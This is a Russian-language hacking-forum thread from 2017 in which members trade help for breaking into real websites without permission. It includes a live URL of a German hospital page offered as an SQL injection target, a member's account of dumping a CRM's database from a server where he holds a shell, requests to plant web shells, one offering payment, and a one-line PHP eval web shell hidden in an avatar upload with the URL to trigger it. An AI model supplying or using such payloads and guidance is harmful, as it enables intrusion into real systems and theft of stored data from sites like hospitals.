Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by +, 27 Apr 2015.

  1. qqq1457

    qqq1457 Member

    Joined:
    13 Oct 2016
    Messages:
    33
    Likes Received:
    10
    Reputations:
    0
    это blind sql

    Про инекции и Способы обнаружения Blind SQL-инъекций:
    https://www.ptsecurity.com/upload/corporate/ru-ru/download/PT-devteev-Advanced-SQL-Injection.pdf
    софт:https://forum.antichat.ru/threads/240692/
    или ручками крути
     
  2. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
  3. BabaDook

    BabaDook Well-Known Member

    Joined:
    9 May 2015
    Messages:
    1,063
    Likes Received:
    1,559
    Reputations:
    40
    Тогда кури в сторону ООБ
     
  4. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    прошу прощения, а что такое ООБ?
     
  5. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    ACat likes this.
  6. Octavian

    Octavian Elder - Старейшина

    Joined:
    8 Jul 2015
    Messages:
    506
    Likes Received:
    101
    Reputations:
    25
    прошу помочь залить шелл.Напишите приватно
     
  7. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    Спасибо.


    Парни, такой вопрос, есть сервер удаленный на нем шелл. Это файловый сервер целого CRM.
    Есть сервер базы данных этого же ЦРМ, но он отдельный. Подключится - могу. С сервера на сервер.
    Дампнуть не получается. Коннект обрывается посли 20 мб данных. А дампить много.

    Как быть?
     
  8. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    такс, mysqldump мне помог.

    Приступаю к курению мануала.
    Кстати, несколько лет назад я был мал и глуп и вы меня не долюбливали. Писал под ником Pirotexnik. Потом в армию забрали)

    Всем доброй ночи :3
     
    #1848 ACat, 9 Apr 2017
    Last edited: 9 Apr 2017
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    3,619
    Likes Received:
    432
    Reputations:
    234
    Code:
    http://www.klinikum-stuttgart.de/kliniken-institute-zentren/frauenklinik-schwerpunkt-geburtshilfe/termine-und-veranstaltungen/?tx_aseventcalendar[attendant]=6
    тока блинд? или у когото вывод получится сделать?
     
  10. negativmans

    negativmans New Member

    Joined:
    5 Mar 2017
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    После заливки шелла, при переходе на шелл, становится битый код, и файл выглядит вот так, в чем может быть проблема ? http://prntscr.com/ewegs9
    возможно не правильный линк? заливал через картинку
     
  11. negativmans

    negativmans New Member

    Joined:
    5 Mar 2017
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    помогите найти путь до шелла, за $$$
     
  12. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    если бы путь был не правильный - он бы у тебя вообще не открылся
    посмотри сорцы открываемой страницы, есть в начале пхп код <?php ? если есть значит пхп не обрабатывается сервером, вероятно настройки nginx/htaccess
     
    _________________________
    negativmans likes this.
  13. negativmans

    negativmans New Member

    Joined:
    5 Mar 2017
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    А у меня вот такая ошибка, когда перехожу по - аватарке
    http://prntscr.com/eweule
    в начале <?php стоит
     
  14. negativmans

    negativmans New Member

    Joined:
    5 Mar 2017
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    а на html нету шеллов?
     
  15. t0ma5

    t0ma5 Reservists Of Antichat

    Joined:
    10 Feb 2012
    Messages:
    828
    Likes Received:
    815
    Reputations:
    90
    html это язык разметки
    SSI разве что если, хотя наверно экзотика уже, гугли "html ssi web shell"
     
    _________________________
    Veil and negativmans like this.
  16. negativmans

    negativmans New Member

    Joined:
    5 Mar 2017
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    всё таки проблема с путями, потому что картинка даже открывается в тексте! помогите найти путь пожалуйста до шелла!
     
  17. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    возможно нет прав для выполнения. Попробуй в аватарку встроить не большой шелл типа <?php; eval($_GET['a']);?>

    и потом обратитьтся avatarka.jpg.php?a=phpinfo();
     
  18. ACat

    ACat Member

    Joined:
    10 Mar 2017
    Messages:
    162
    Likes Received:
    31
    Reputations:
    0
    тебе же написали выше, что проблема не с путями, проблема с правами.

    Ты случайно не молдован?
     
    Veil likes this.
  19. cat1vo

    cat1vo Level 8

    Joined:
    12 Aug 2009
    Messages:
    375
    Likes Received:
    343
    Reputations:
    99
    Файл открывается по такой ссылке site.com/user/12345/avatar?123456, где просто выводится содержимое файла, без разницы на расширение, то есть мы получаем его контент, а не выполнение. Так как даже картинка, выводится текстом, отсюда обычная читалка. Получить полный путь до файлов заливаемых на сервер возможности нет (видно что об этом позаботились), что бы понять где и как они лежат и в какой расширение приходят на сервер, возможно оно и заливается в .php, но обратиться к файлу мы не можем, потому всякие догадки про права не верны!
    З.Ы. Не стоит делать поспешных выводов не зная сути проблемы! Надеюсь я ясно объяснил и вопросы лишние отпадут.
     
    crlf and negativmans like this.
  20. negativmans

    negativmans New Member

    Joined:
    5 Mar 2017
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    мы с cat1vo Молдовани.
    Но ситуацию это не меняет не как.